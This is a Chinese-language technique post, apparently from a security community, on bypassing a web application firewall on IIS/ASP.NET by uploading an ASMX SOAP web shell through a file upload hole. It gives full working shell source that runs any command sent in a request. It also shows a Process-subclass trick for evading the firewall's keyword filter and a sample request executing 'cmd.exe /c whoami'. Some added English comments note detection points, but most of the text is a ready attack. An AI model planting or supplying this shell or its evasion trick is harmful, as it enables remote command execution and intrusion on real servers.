
### 以下信息来自倾旋知识星球,在此做整理
> 近日遇到一个WAF，目标服务器配置如下
> 1.ASP.NET
> 2.IIS
> 3.Windows
> 4.X WAF
> 5.不允许上传 ASP、ASPX、ASA、CER、....
> 6.任意文件上传漏洞
> 于是想到还可以用ASMX构建SOAP接口，分享给大家以便留存
> 另外WAF还拦截“Process()”，于是在C#代码里创建了一个子类继承Process父类，然后实例化
![](img/process.png)
```
// Subclass of System.Diagnostics.Process whose only purpose is to keep the
// literal token "Process(" out of the source text (see the note above).
// The constructor takes a string and ignores it; the object is still a
// Process, so starting it creates an OS child process like any other
// Process instance — the source-level name changes nothing at runtime.
public class New_Process :Process
{
public New_Process(string s)
{
}
}
// Declared as the base type; the subclass adds no behaviour, only a different name.
Process e = new New_Process("something");
```
```
POST /UploadPath/User/201908221824334713.asmx HTTP/1.1
Host: example.com
Content-Type: text/xml; charset=utf-8
Content-Length: 363
SOAPAction: "http://payloads.online/Test"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<Test xmlns="http://payloads.online/">
<Z1>cmd.exe</Z1>
<Z2>/c whoami</Z2>
</Test>
</soap:Body>
</soap:Envelope>
```
---------------------------------------------------
![](img/ASMX.png)
```
<%@ WebService Language="C#" Class="Service" %>
using System;
using System.Web;
using System.IO;
using System.Net;
using System.Text;
using System.Data;
using System.Data.SqlClient;
using System.Collections.Generic;
using System.Diagnostics;
using System.Web.SessionState;
using System.Web.Services;
using System.Xml;
using System.Web.Services.Protocols;
[WebService(Namespace = "http://payloads.online/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
// Subclass of System.Diagnostics.Process that exists only so the literal
// token "Process(" does not appear in the source (see the note above).
// The constructor ignores its argument; at runtime this is an ordinary
// Process, so the usual process-creation telemetry is unaffected.
public class New_Process :Process
{
public New_Process(string s)
{
}
}
/// <summary>
/// ASMX web service exposing one SOAP operation, <c>Test</c>, that starts an
/// arbitrary process. Both the executable and its arguments are taken
/// unvalidated from the SOAP request body, i.e. this is a remote
/// command-execution endpoint (the request sample above passes
/// <c>cmd.exe</c> and <c>/c whoami</c>).
/// </summary>
public class Service : System.Web.Services.WebService
{
public Service()
{
}
/// <summary>
/// Starts <paramref name="Z1"/> with arguments <paramref name="Z2"/>, captures
/// its stdout and stderr, and writes them into the HTTP response body.
/// </summary>
/// <param name="Z1">Executable to start; used verbatim from the request.</param>
/// <param name="Z2">Command-line arguments; used verbatim from the request.</param>
/// <returns>Concatenated stdout and stderr of the child process.</returns>
/// <remarks>
/// Defensive notes: the child process is spawned by the hosting web-server
/// worker (IIS/ASP.NET per the page's description), which is a standard
/// detection point for web shells. The output is wrapped in a CDATA section
/// between the markers "->|" and "|<-", written here as hex escapes —
/// presumably so the literal strings are absent from the file on disk;
/// response-body inspection can still key on the decoded markers.
/// </remarks>
[WebMethod]
public string Test(string Z1,string Z2)
{
String R;
// Executable name and arguments come straight from the SOAP parameters.
ProcessStartInfo c = new ProcessStartInfo(Z1,Z2);
Process e = new New_Process("something");
StreamReader OT, ER;
// Stream redirection requires UseShellExecute = false.
c.UseShellExecute = false;
c.RedirectStandardOutput = true;
c.RedirectStandardError = true;
e.StartInfo = c;
e.Start();
OT = e.StandardOutput;
ER = e.StandardError;
e.Close();
R = OT.ReadToEnd() + ER.ReadToEnd();
// Discard the normal SOAP response and emit a minimal XML document instead.
HttpContext.Current.Response.Clear();
HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
HttpContext.Current.Response.Write("<data>");
HttpContext.Current.Response.Write("<![CDATA[");
// "\x2D\x3E\x7C" decodes to "->|".
HttpContext.Current.Response.Write("\x2D\x3E\x7C");
HttpContext.Current.Response.Write(R);
// "\x7C\x3C\x2D" decodes to "|<-".
HttpContext.Current.Response.Write("\x7C\x3C\x2D");
HttpContext.Current.Response.Write("]]>");
HttpContext.Current.Response.Write("</data>");
HttpContext.Current.Response.End();
return R;
}
}
```